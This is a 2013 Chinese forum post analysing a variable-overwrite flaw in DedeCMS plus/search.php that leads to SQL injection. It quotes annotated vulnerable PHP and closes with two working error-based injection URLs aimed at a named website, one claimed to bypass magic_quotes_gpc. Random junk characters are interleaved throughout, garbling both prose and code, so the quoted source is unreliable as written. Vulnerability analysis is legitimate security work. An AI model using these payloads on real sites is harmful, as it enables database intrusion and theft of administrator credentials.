微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.' a3 p1 e1 q8 d, h5 s
作者: c4rp3nt3r@0x50sec.org5 A I& I7 M! b2 g! u( S
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
+ L9 y* D' e3 B' y9 U- w/ d( | - P/ w9 c% i6 |5 ]+ y' }% K
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
2 m3 ?; u7 b4 D, o2 h: s3 _
2 D; p8 ^4 g7 z1 l+ x( o8 \! }+ C============) `8 r9 ~8 b$ h; v* l
+ F. j8 f% n! d- E' T( h& c: P
, l$ W& M( `0 @# L# w
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.5 r1 s4 b7 G5 p/ ^
' R( p* m" A& w5 d
require_once(dirname(__FILE__).”/../include/common.inc.php”);( x/ y* t5 q% }2 V1 F o
require_once(DEDEINC.”/arc.searchview.class.php”);
/ q5 A2 x* z! V2 L K 7 b3 q. X. [+ l! {" r6 U# F& L
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;- w1 n) ~% r' n6 Z- F6 @1 _
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
" a# p- o( r1 {! R$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
3 Y% i! e# B9 V- |$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;% k6 l* y$ v" Q1 d
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;1 ]* q6 |: Q! z% z4 [
" Y* s0 A) v* A
if(!isset($orderby)) $orderby=”;
6 C/ t" n! I9 ~: E% Yelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
& P( B m* A$ ?) A" `) v g
J' X, H/ j7 P( E2 d4 u * V, h4 ^5 j$ G+ D. X& e C
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;9 K$ r. \, ~) C
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
. q+ `- C1 P5 s: i: Z+ k + p' ^: j" o- }, i& z9 l- B
if(!isset($keyword)){
8 N& L" O9 p5 A9 { if(!isset($q)) $q = ”;
7 ^$ s% ?) }9 T3 J3 I' n) a8 N+ B$ j0 e $keyword=$q;
- H8 `" f" h/ S0 L) P4 x; H2 k7 R}
# A; g1 m1 H. v+ }5 t 6 \) c E2 v; l9 B$ @1 F/ J
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));- N0 {/ l4 [ L' x4 \
) O; U' L) E9 _# T2 ^//查找栏目信息
% w- c) ]6 |6 \) S# w, x, n/ qif(empty($typeid))
0 G3 |2 U, t9 j( N9 J{
& [. }) P! h4 v7 E $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;/ v# i6 z$ i1 E- R
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ), o% ?2 i# i4 J* Q1 I( X# ~5 R
{- @2 C- ~! v1 f
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
: Q$ O5 B& H$ t0 B$ x- Q% d fwrite($fp, “<”.”?php\r\n”);
# b$ F9 U2 C* t } $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);" n2 w+ M4 H% C) A2 y" P+ K& t4 R
$dsql->Execute();
8 p0 N1 p" j( b: v* E5 Q% J while($row = $dsql->GetArray())
9 X e% x6 N2 W, P& F9 g {4 I, C* @: {! i' `% G: Y# [, c" ~
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);$ i k; x* t2 A- ^& x1 \) I2 C
}' } H' V2 B+ b! j9 z6 _) c& E; _" O
fwrite($fp, ‘?’.'>’);
. K5 F: t; J) n8 P; Z5 r fclose($fp);; {8 S+ c' a2 p7 e t5 t
}
/ w- m' b8 @, p {8 z- @ //引入栏目缓存并看关键字是否有相关栏目内容
; T7 l k( C! [7 B" h& l require_once($typenameCacheFile);' u4 c- L! ^& ]+ Y
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个) F* |! l5 `$ D0 `) c
//
7 q, G& c2 Z! R# k4 ^ if(isset($typeArr) && is_array($typeArr))1 y1 T/ ~ a* Q9 k4 Q
{8 O9 E Q" d. V( j+ Q1 k
foreach($typeArr as $id=>$typename)
7 U+ P& R/ B2 h* Z, I {
1 J8 U: d4 k5 k$ K9 z 3 @1 U' ]4 l, t7 X$ l
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过- G' C# N/ X( Z& v8 `
if($keyword != $keywordn)$ q$ f& R) P K. ]
{! B2 Q+ R& J/ ^' H
$keyword = $keywordn;1 N9 S8 a8 S! l6 M5 [) G/ O0 F" g
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设- x' P* n' j( B( \
break;6 [7 t' L+ A' ?1 \' I+ O
}' _' T2 K& ]& m5 o1 a2 z; ~/ [
}
$ g+ W( K# C4 _; P3 q* x6 f }# b2 B: P; J! v5 }" ?
}# L2 b7 C( ]8 Z9 W. d g3 J
然后plus/search.php文件下面定义了一个 Search类的对象 .
~/ q$ k2 o9 O6 p% u在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
6 }3 g9 b. p# M( U# h* e$this->TypeLink = new TypeLink($typeid);4 r3 r& ?" T# r
j/ T$ W, q$ u7 ^1 [& I
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
# x# S; A* m+ t. o
9 R! u2 p* R" n- Jclass TypeLink: o. L7 Q* H0 t/ J2 S9 H
{ C+ x. a7 h8 }& `' B$ @) c
var $typeDir;
& {4 p9 Y. f# {- ^: A) e var $dsql;) S# e6 s2 A! G/ p, m7 K6 ?% h
var $TypeID;! I$ r! l/ t8 t
var $baseDir;/ @9 D1 Y9 b$ o
var $modDir;0 y+ Y5 b9 W% o' B
var $indexUrl;
5 B" d1 g$ T* v0 n var $indexName;
% E& d% z6 r' U, K0 Z var $TypeInfos;1 V! r' ~$ ?$ f; o) z) |
var $SplitSymbol;
9 ]/ o. _' U) ~- Q' ?3 N- C# f var $valuePosition;
! T2 w3 d' I3 ?, p5 w( C var $valuePositionName;
6 A* j% b6 [. Q5 [ u var $OptionArrayList;//构造函数///////! D6 A3 O3 Z# K+ b4 A( b
//php5构造函数$ C* G) H+ a7 Z6 ]
function __construct($typeid)
+ O3 [- c! R) X- G! Q {, \2 z) ]0 y* n9 S
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];- W4 t( D- k k M4 [
$this->indexName = $GLOBALS['cfg_indexname'];
6 E/ n% R5 ^- F3 b; J" O $this->baseDir = $GLOBALS['cfg_basedir'];
* E S% q8 ^7 }5 F( D# `/ J $this->modDir = $GLOBALS['cfg_templets_dir'];
+ a% s9 s" Y2 D $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
$ F! X. ^% c. U) @, }, [" b% C9 y" ] $this->dsql = $GLOBALS['dsql'];0 ]7 p7 z: b& c+ z# j1 F, n
$this->TypeID = $typeid;
2 ]1 z+ o9 k/ Q! p& ?4 q0 ~ $this->valuePosition = ”;
) _" [& ^& h* f) {* u5 \* I $this->valuePositionName = ”;
8 _) V p8 t5 ?3 x. h. N( P $this->typeDir = ”;
( u& A" Y! ?! V, D/ n $this->OptionArrayList = ”;
8 v+ g* L2 p- H ! f: F) @7 c4 S z
//载入类目信息
2 f: d- ]1 N/ I: |5 Z - c+ q" V+ c! o" i; A( q6 ?$ \( w
<font color=”Red”>$query = “SELECT tp.*,ch.typename as1 ] Q( u o( a! C* d' L" g I* M% \
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
# b4 T# u8 G/ ^7 i7 k% T; Z`#@__channeltype` ch, F* S* _8 T% b1 N1 c
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿' Q! Q6 M2 q# J& U# Q% z0 m$ D& u
% x% }6 g/ q5 A0 t if($typeid > 0)$ h, [! }6 k* S4 G7 m3 x g! E; U
{5 }' l9 r( ?' ^) ~& Z; x% X/ T! I
$this->TypeInfos = $this->dsql->GetOne($query);' ]( a* v! x% m5 e {9 H# `
利用代码一 需要 即使magic_quotes_gpc = Off
4 X0 S/ }+ Z8 [. k
6 k! {* ?3 f n; T/ ]www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title" f2 s' `1 d8 M
, R) @/ z; y# ~8 g这只是其中一个利用代码… Search 类的构造函数再往下& \ N' S u1 {: E: ~6 D
; D3 h5 o8 F' W p& k3 K……省略
. `0 L3 {" o6 b. d" u$this->TypeID = $typeid;+ R5 |* n4 n( L; m. {
……省略( U. z6 e M3 ~. b9 |+ E/ }0 v
if($this->TypeID==”0″){& e1 E& a+ C" q4 [$ v7 ^8 r2 a& I
$this->ChannelTypeid=1;1 [; z6 d+ w5 u( X& a" B6 H( I9 n& h; M1 S
}else{5 _$ c! N/ s3 b2 S4 F
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲- A0 \' |+ N. y, j. O' ?
//现在不鸡肋了吧亲…( J9 q [4 a) v; e8 r) W4 ~- ` x+ ?
$this->ChannelTypeid=$row['channeltype'];% Y& v; r! D' l' Y5 }! M! [
" J7 {* u3 k: E
}
1 x0 S: I6 T/ d* f- v/ P- a利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.& \) F7 P/ n/ T) S
7 B1 u8 e8 S" @7 A5 y
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
$ m8 B; v' K! W( k# a, f $ v' |* w7 ^1 y6 n" F
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站$ j+ W# h: @$ `( ^1 Q- x( Q1 D
|
发表于 2013-1-19 08:18:56
收藏
支持
反对